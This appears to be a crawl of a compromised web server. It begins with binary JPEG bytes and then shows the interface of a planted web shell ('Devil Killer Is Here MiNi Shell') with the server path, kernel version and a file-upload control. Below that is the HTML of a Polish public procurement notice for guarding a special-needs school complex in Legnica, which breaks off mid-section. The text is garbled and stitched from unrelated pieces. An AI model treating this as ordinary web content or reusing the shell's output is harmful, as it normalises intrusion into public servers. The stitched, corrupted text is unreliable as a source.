JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20241002/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20241002/0052699301-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Ochrona mienia obiektu wraz z terenem należącym do Zespołu Placówek Specjalnych w Legnicy przy ulicy Mazowieckiej 3 </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">ZESPÓŁ PLACÓWEK SPECJALNYCH W LEGNICY</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">ZPS LEGNICA</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 020335802</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Mazowiecka 3</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Legnica</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">59-220</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">dolnośląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL516 - Legnicko-głogowski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@zps.legnica.eu</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.zps.legnica.eu</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Edukacja</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Ochrona mienia obiektu wraz z terenem należącym do Zespołu Placówek Specjalnych w Legnicy przy ulicy Mazowieckiej 3 </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-393a1b7f-1eae-4975-b4b1-02a8ccb6c070</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00526993</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-10-02</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00481635/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.1 „Ochrona mienia obiektu wraz z terenem należącym do Zespołu Placówek Specjalnych w Legnicy przy ulicy Mazowieckiej 3”</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.13.) O zamówienie mogą ubiegać się wyłącznie wykonawcy, którzy spełniają warunki określone w art. 361 ustawy – usługi społeczne: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-393a1b7f-1eae-4975-b4b1-02a8ccb6c070 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1. W postępowaniu o udzielenie zamówienia publicznego komunikacja między Zamawiającym a wykonawcami odbywa się przy użyciu Platformy e-Zamówienia, która jest dostępna pod adresem https://ezamowienia.gov.pl.<br/>2. Korzystanie z Platformy e-Zamówienia jest bezpłatne.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Dokumenty elektronicz. (oferta, oświadczenia oraz wszelkie dokumenty przekazywane Zamawiającemu w postępowaniu), o których mowa w § 2 ust. 1 rozporz. Prez. R. M. z dnia 30.12.2020 r. w spr. spos. sporządzania i przekazywania informacji oraz wymagań technicz. dla dokumentów elektronicz. oraz środ. komunikacji elektronicz. w postępowaniu o udzielenie zamówienia publicz. lub w konkursie (Dz. U. z 2020 r. poz. 2452), sporządza się w postaci elektronicz., w formatach danych określonych w przepisach rozporz. R. M. z dnia 12.04. 2012 r. w spr. Krajowych Ram Interoperacyjności, minim. wymagań dla rejestrów publicz. i wymiany informacji w postaci elektronicz. oraz minim. wymagań dla systemów teleinformatycz. (Dz. U. z 2017 r. poz. 2247), z uwzględnieniem rodzaju przekazywanych danych i przekazuje się jako załączniki.<br/>2. Informacje, oświadczenia lub dokumenty, inne niż wymienione w § 2 ust. 1 rozporz. Prez. R. M. z dnia 30.12.2020 r. w spr. spos. sporządz. i przekazyw. informacji oraz wymagań technicz. dla dokum. elektronicz. oraz środków komunikacji elektronicz. w postępow. o udzielenie zam. publicz. lub w konkursie (Dz. U. z 2020 r. poz. 2452), przekazywane w postępow. sporządza się w postaci elektronicz.:<br/>a) w formatach danych określonych w przepisach rozporządzenia Rady Ministrów z dnia 12 kwietnia 2012 r. w sprawie Krajowych Ram Interoperacyjności (Dz. U. z 2017 r. poz. 2247), (i przekazuje się jako załącznik), lub<br/>b) jako tekst wpisany bezpośrednio do wiadomości przekazywanej przy użyciu środków komunikacji elektronicznej (np. w treści wiadomości e-mail lub w treści „Formularza do komunikacji”).<br/>3. Jeżeli dokumenty elektroniczne, przekazywane przy użyciu środków komunikacji elektronicznej, zawierają informacje stanowiące tajemnicę przedsiębiorstwa w rozumieniu przepisów ustawy z dnia 16 kwietnia 1993 r. o zwalczaniu nieuczciwej konkurencji (t.j. Dz. U. z 2022 r. poz. 1233) wykonawca, w celu utrzymania w poufności tych informacji, przekazuje je w wydzielonym i odpowiednio oznaczonym pliku, wraz z jednoczesnym zaznaczeniem w nazwie pliku „Dokument stanowiący tajemnicę przedsiębiorstwa”. Szczegółowe informacje dotyczące zasad przekazywania Zamawiającemu informacji i dokumentów stanowiących tajemnice przedsiębiorstwa znajdują się w pkt. XIV ust. 8 SWZ.<br/>4. Komunikacja w postępowaniu, z wyłączeniem składania ofert, odbywa się drogą elektroniczną za pośrednictwem formularzy do komunikacji dostępnych w zakładce „Formularze” („Formularze do komunikacji”). Za pośrednictwem „Formularzy do komunikacji” odbywa się w szczególności przekazywanie wezwań i zawiadomień, zadawanie pytań i udzielanie odpowiedzi. Formularze do komunikacji umożliwiają również dołączenie załącznika do przesyłanej wiadomości (przycisk „dodaj załącznik”).<br/>W przypadku załączników, które są zgodnie z ustawą Pzp lub rozporządzeniem Prezesa R. M. w spr. wymagań dla dokumentów elektronicz. opatrzone kwalifik. podpisem elektronicz., podpisem zaufanym lub podpisem osobistym, mogą być opatrzone, zgodnie z wyborem wykonawcy/wykonawcy wspólnie ubiegającego się o udzielenie zam./podmiotu udostępniając. zasoby, podpisem typu zewnętrznego lub wewnętrznego.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1.Administr. Pani/a dan. osob. jest Zespół Placówek Specjalnych z siedz. w Legnicy przy ul. Mazowieckiej 3, 59-220 Legnica, tel. kont.: 767233114, adres pocz. elektron. sekretariat@zps.legnica.eu.<br/>2. Administr. dan. osob. inform., iż został powoł. Inspek. ochr. dan., którego funkcję pełni P. Mariusz Kwaśnik. Kontakt z Inspek. jest możliwy za pośred. poczty elektron.: iod@valven.pl lub pisemnie na adres siedz. Administr. dan., wskazany powyżej.<br/>3. Pani/a dane osob. będą przetwarz. w celu związ. z przeprowadz. postępow. o udziel. zamów. publicz., którego wartość jest równa lub przekr. kwotę 130 000 zł netto w trybie podstaw. o jakim stanowi w art. 275 pkt 1 ustawy Pzp, wyłonienia wykonawcy, realizacji umowy, ewentual. dochodz. roszczeń i obrony przed roszczen.<br/>4. Administr. będzie przetwarz. Państwa dane osob. na podst.: a) art. 6 ust. 1 lit. c RODO; b) art. 6 ust. 1 lit. b RODO; c) art. 6 ust. 1 lit. f RODO;<br/>5. Odb. Pani/a danych osob. będą osoby lub podm. zainteresowane, którym udostępniona zostanie dokument. postępow. w oparciu o art. 18, 74 ustawy Pzp. Odbiorc. Pani/ a dan. będą również podm., z którymi współpracuje Administr.: dostawca BIP, poczty elektronicz., dostawca platformy na której Zamaw. prowadzi postępow. o udziel. zamów. publicz. https://ezamowienia.gov.pl/pl/ , a także operator poczt. w rozum. ust. z dnia 23 .11. 2012 r. Prawo pocztowe, osoba dostarczająca korespon. na zasad. określ. w art. 65 ust.2 , 401 ust. 1, 508 ust. 2 ustawy Pzp.<br/>6.Pani/ a dane osob., zostały pozyskane od Oferenta biorąc. udział w postępow. o udziel. zam. publicz., którego wartość jest równa lub przekr. kwotę 130000 zł netto w tryb. podst. o jakim stanowi art. 275 pkt 1 ustawy Pzp.<br/>7. Będziemy przetwarz. następujące Pani/ a dane osob.: imię i nazwisko, pełnioną funkcję, stanowisko, nazwę i adres firmy/instytucji, którą Pani/ n reprezentuje, nr telef., adres email.<br/>Mogą wystąpić przypadki w których Administr. będzie przetwarzał dane: nr uprawnień zawod., dane zawarte w udziel. pełnomoc., informacje dot. doświad. zawodow., nr rach. bankow., opinie związane z realizacją umowy.<br/>8. Podanie przez Panią/a danych osob. jest wymogiem ustaw., wynikającym bezpośr. z przepisów ust. Pzp, związanym z udziałem w postępow. o udziel. zamów. publicz. i stanowi warunek uczest. w przetar. oraz gdy dana oferta zostanie wybrana jest warunk. zawarcia umowy. Niepodanie danych może skutkować brakiem zakwalifikowania do uczestnictwa w przetargu.<br/>9. Administr. przechowuje protokół postępow. wraz z załącz. przez okres 5 lat od dnia zakoń. postępow. o udziel. zamów., w spos. gwarantujący jego nienaruszalność.<br/>10. Administr. dan. osob. oświad. i zapew., że stosowane przez Niego środ. organizac. i technicz. w celu zapew. bezpiecz. procesom przetwarz. dan. osob. odpowiadają wymaganiom określ. w RODO, w szczegól. postanow. art. 32 RODO.<br/>11. Posiada Pani/n prawo do: żądania od Administr. dostępu do dan. osob. oraz otrzymania ich kopii na podst. art. 15 RODO; pr. do sprostowania Pani/a dan. osob. na podstawie art. 16 RODO; pr. żądania od Administr. ogranicz. przetwarz. dan. osob. z zastrzeż. przypadków, o których mowa w art. 18 ust. 2 RODO; pr. do usunięcia danych w pr. do żąd. usunięcia dan. osobow., w syt. gdy przetwarz. danych nie następuje w celu wywiązania się z obow. wynik. z przep. pr. wskazan. w art. 6 ust. 1 lit. c RODO (art. 17 RODO); pr. do przenoszenia dan. osob., gdy przetwarz. odbywa się na podst. art. 6 ust. 1 lit. b RODO oraz przetwarz. odbywa się w spos. zautomatyzowany (art. 20 RODO); pr. do sprzeciwu wobec przetwarz. danych Pani/Pana dotycz., gdy przetwarz. dan. odbywa się na podst. art. 6 ust.1 lit. f RODO (art. 21 RODO).<br/>Zakr. każdego z tych praw oraz sytuacje, z których można z nich skorzystać, wynikają z przep. RODO. Z pr. tych może Pani/Pan skorzystać składając wniosek u Administr.<br/>12. Przysług. Pani/u pr. do złożenia skargi do organu nadzorcz. – Prez. Urzędu Ochr. Dan., ul. Stawki 2, 00-193 W-wa.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZPS 2/26.02.2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia jest ochrona mienia obiektu wraz z terenem należącym do Zespołu Placówek Specjalnych w Legnicy przy ulicy Mazowieckiej 3.<br/>Obiekt, w którym znajduje się Zespół Placówek Specjalnych w Legnicy przy ul. Mazowieckiej 3<br/>składa się z trzech kondygnacji nadziemnych i jednej podziemnej podzielonych na segmenty dydaktyczno-administracyjne: A, B, C, D i S, kuchni, stołówki oraz trzech sal sportowych o łącznej powierzchni użytkowej ok. 9 930 m2. Obiekt położony jest na ogrodzonej działce, z kompleksem boisk i terenami zielonymi, o powierzchni ok.10 888 m2.<br/>2. Wykonawca sprawował będzie bezpośrednią ochronę fizyczną. Obiekt szkolny objęty będzie<br/>dozorem i ochroną w okresie 12 miesięcy od podpisania umowy w wymiarze ok 6800 roboczogodzin - od poniedziałku do piątku w godzinach od 15.00 do 7.00 (16h), a w soboty, niedziele oraz święta i dni ustawowo wolne przez całą dobę (24h) – posterunek jednoosobowy.<br/>W wyjątkowej sytuacji związanej ze zmianą organizacji dnia pracy szkoły zastrzega się możliwość zwiększenia lub zmniejszenia ilości godzin ochrony po wcześniejszym uzgodnieniu ze Zleceniobiorcą. Ewentualne zmiany w harmonogramie godzin ochrony zgłaszane będą w drodze telefonicznych uzgodnień potwierdzonych w formie pisemnej.<br/>Przed zawarciem umowy Wykonawca zobowiązany jest wykonać audyt bezpieczeństwa poprzez zapoznanie się: <br/>	z urządzeniami monitoringu szkolnego(kamery, czujniki, ręczny sys. ostrzegania ppoż. oraz inne urządzenia monitorujące), <br/>	z rozmieszczeniem w budynku wyłączników energii elektrycznej, wind oraz głównych zaworów wodnych, <br/>	zapoznanie się z rozmieszczeniem i obsługą podręcznego sprzętu gaśniczego,<br/>	zapoznanie się z terenem objętym ochroną(drogi ewakuacyjne, system oddymiania).<br/>3. Obowiązki Wykonawcy:<br/>Do obowiązków Wykonawcy należy:<br/>1) ochrona mienia będącego własnością Zamawiającego oraz mienia użytkowanego przez Zamawiającego, będącego przedmiotem tej umowy, znajdującego się na terenie ochranianego obiektu lub obszaru, w tym: <br/>a)	ochrona przed włamaniem do ochranianych obiektów oraz ochrona przed zaborem lub uszkodzeniem mienia znajdującego się w ochranianych obiektach,<br/>b)	zapewnienie pełnienia dyżuru w porze wyznaczonej harmonogramem (punktualnie objęcie służby),<br/>c) zapewnienie całodobowej gotowości i interwencji załóg patrolowo-interwencyjnych, które podejmą działania ochronne, niezwłocznie po uzyskaniu sygnału o alarmie (bez ograniczeń ilości wyjazdów), <br/>d)	interwencja wobec osób zakłócających porządek na ochranianym obiekcie, <br/>e)	ujawniania Zamawiającemu faktów włamań, kradzieży, zniszczeń i dewastacji ochranianego obiektu,<br/>f) wykonywanie obowiązku ochrony z należytą starannością, <br/>g)	zgłaszanie Zamawiającemu usterek oraz naruszeń w zabezpieczeniach obiektu, <br/>h)	zabezpieczenie miejsc zalania w obiekcie w celu niedopuszczenia do powiększenia strat <br/>do czasu przybycia osoby odpowiedzialnej ze strony Zamawiającego,<br/>2) bezpośredni, fizyczny dozór obiektu i mienia Zamawiającego wraz z terenami zielonymi, przyległymi do obiektu, w tym kompleksu boisk szkolnych, w dniach roboczych od godz. 15.00 <br/>do godz. 7.00, natomiast w weekendy, dni wolne ustawowo, święta - całodobowo,<br/>3) sprawdzanie stanu zamknięć i zabezpieczeń, wpis do zeszytu raportów oraz zgłaszanie Zamawiającemu naruszeń związanych ze stanem zabezpieczenia mienia w ochranianym obiekcie jak również bieżące informowanie o zauważonych nieprawidłowościach do osoby wskazanej w umowie, <br/>4) sprawdzenie stanu zamknięcia bram wjazdowych, bramek wejściowych i oświetlenia,<br/>5) wsparcie grupy interwencyjnej w przypadku zagrożenia dla chronionego mienia oraz ludzi w celu niezwłocznego zawiadomienia Policji, ustala się maksymalny czas dojazdu do 15 minut,<br/>6) aktywna służba pracowników ochrony, niedopuszczanie do przemieszczania się osób nieuprawnionych i wchodzenia do budynku,<br/>7) monitoring systemów ochronnych, w tym obowiązkowe szkolenia pracowników z ich obsługi systemów funkcjonujących w placówce,<br/>8) udzielanie wsparcia w przypadku ewakuacji ludzi z budynku,<br/>9) dozór i obserwacja obiektu oraz mienia w sytuacji zagrożenia klęskami żywiołowymi lub awariami,<br/>10) zgłaszanie osobie wskazanej z ramienia Zamawiającego o sytuacji zagrożenia budynku, <br/>11) bezzwłoczne zawiadamianie grupy interwencyjnej po stwierdzeniu zagrożenia,<br/>12) stała obserwacja monitoringu wizyjnego, <br/>13) sprawowania nadzoru nad funkcjonowaniem instalacji alarmowej w obiekcie<br/>14) egzekwowanie zakazu parkowania przez osoby nieupoważnione w obrębie chronionego obiektu.<br/><br/>Wykonawca zobowiązuje się do bezwzględnego przestrzegania przepisów wewnętrznych, obowiązujących w ochranianym obiekcie, a zwłaszcza planu ewakuacji, procedur zabezpieczenia pomieszczeń obiektu oraz postępowania z kluczami, instrukcji bezpieczeństwa ppoż. oraz stosowanie się do poleceń Zamawiającego. <br/><br/>4. Podstawowe obowiązki pracownika ochrony:<br/>1) stała obserwacja monitoringu wizyjnego oraz sumienne pełnienie dyżuru w porze wyznaczonej harmonogramem (punktualnie objęcie służby) oraz ochrona obiektu obejmująca cały budynek, boiska szkolne i teren niezabudowany,<br/>2) czuwanie nad bezpieczeństwem osób znajdujących się w obiekcie - ochrona osób tj. interwencja w przypadku zagrożenia bezpieczeństwa uczniów, pracowników, znajdujących się w budynku <br/>i na terenie szkoły,<br/>3) niezwłoczne informowanie przedstawiciela Zamawiającego o zdarzeniach zagrażających bezpieczeństwu osób i mienia mających miejsce na terenie obiektu szkolnego, a także <br/>o potencjalnych zagrożeniach oraz powiadomienie służb: Policji, Straży Pożarnej, Pogotowia<br/>Ratunkowego i in.,<br/>4) w przypadku wystąpienia zdarzeń wyjątkowych np. włamanie, kradzież, dewastacja, działania osób niebezpiecznych wezwanie Grupy Interwencyjnej Wykonawcy, która zobowiązana jest dojechać <br/>do siedziby Zamawiającego w uzgodnionym czasie od momentu wezwania przez pracownika ochrony i rozpocząć interwencję,<br/>5) obsługa dyżurki tj.: prowadzenie książki wejść i wyjść pracowników i osób postronnych na teren placówki, odbieranie telefonów, wydawanie kluczy do pomieszczeń, inne czynności uzgodnione <br/>z Zamawiającym, dokonywanie wpisów do książki wydawania kluczy przy każdorazowym wydaniu<br/> i przyjęciu kluczy do pomieszczeń służbowych upoważnionym pracownikom<br/>6) dokonywanie nieregularnych obchodów korytarzy, pomieszczeń oraz terenu na zewnątrz budynku potwierdzone zapisem w książce służby<br/>7) prowadzenie dokumentacji dotyczącej przebiegu pełnionej służby (przejęcie i zdanie obiektu,<br/>kontrola wewnętrzna osób nadzorujących pracę, przebieg służby, stwierdzone zagrożenia wraz<br/>ze sposobem podjętej interwencji),<br/>8) obsługa wszystkich urządzeń monitoringu będących własnością Zleceniobiorcy, w które wyposażony jest obiekt (kamery) oraz zgłaszanie uwag na temat ich funkcjonowania, <br/>9) obsługa bramek wejściowych oraz bram wjazdowych,<br/>10) codzienne dokonywanie nieregularnych obchodów korytarzy, pomieszczeń oraz terenu<br/> na zewnątrz budynku potwierdzone zapisem w książce służby, <br/>11) reagowanie w przypadku zauważenia awarii - w miarę możliwości zabezpieczenie miejsca awarii<br/> i zawiadomienie osoby upoważnionej ze strony Zamawiającego a także zawiadomienie w razie konieczności odpowiednich służb,<br/>12) codzienne sprawdzenie budynku w zakresie zamknięć drzwi i okien, wyłączników, wygaszenie świateł, sprawdzanie kompletności kluczy, sprawdzanie czy z pomieszczeń nie wydobywa się podejrzany zapach, np. swąd spalenizny, dym itp.- sprawdzanie prawidłowości zamknięcia drzwi <br/>i okien zwłaszcza po opuszczeniu chronionego obiektu przez pracowników szkoły, W/w obowiązki Wykonawca zobowiązany jest wykonać po zakończeniu prac porządkowych przez pracowników obsługi zatrudnionych w szkole. Obowiązek dotyczy wszystkich pomieszczeń, do których Zleceniodawca udostępni klucze,<br/>13)	udostępnianie pomieszczeń szkoły oraz szkolnych terenów sportowych podmiotom wynajmującym zgodnie z zawartymi umowami najmu pomieszczeń szkoły - wydawanie kluczy podmiotom oraz przyjmowanie kluczy po zakończonym wynajmie, oraz nadzór nad przestrzeganiem obowiązujących regulaminów przez osoby użytkujące boiska oraz podejmowanie interwencji wobec osób łamiących zasady korzystania z terenów sportowych (palenie tytoniu, spożywanie alkoholu, dewastacja mienia itp.),<br/>14) pracownicy ochrony mają obowiązek przestrzegania zasad należytego zachowania się i dbania <br/>o swój wygląd zewnętrzny oraz utrzymywania w czystości i porządku pomieszczeń służbowych<br/> i przydzielonego sprzętu.<br/>5. Wykonawca zobowiązany będzie świadczyć usługi w oparciu o zatrudnionych pracowników. Wykaz pracowników Wykonawca przekazywał będzie osobie upoważnionej przez Zleceniodawcę.<br/><br/>6. Wykonawca zapewnia, że spełnia wymogi określone w art. 28 RODO (Dz.U poz.1000 z dnia 24 maja 2018 r. O ochronie danych osobowych).<br/><br/>7. Wykonawca zobowiązany jest do zachowania tajemnicy w zakresie realizacji przedmiotu zamówienia. <br/><br/>8. Wykonawca zobowiązany jest zapewnić pracownikom ochrony, wykonującym prace na obiekcie, wsparcie Grupy Interwencyjnej w każdym uzasadnionym przypadku. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">79710000-4 - Usługi ochroniarskie</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje 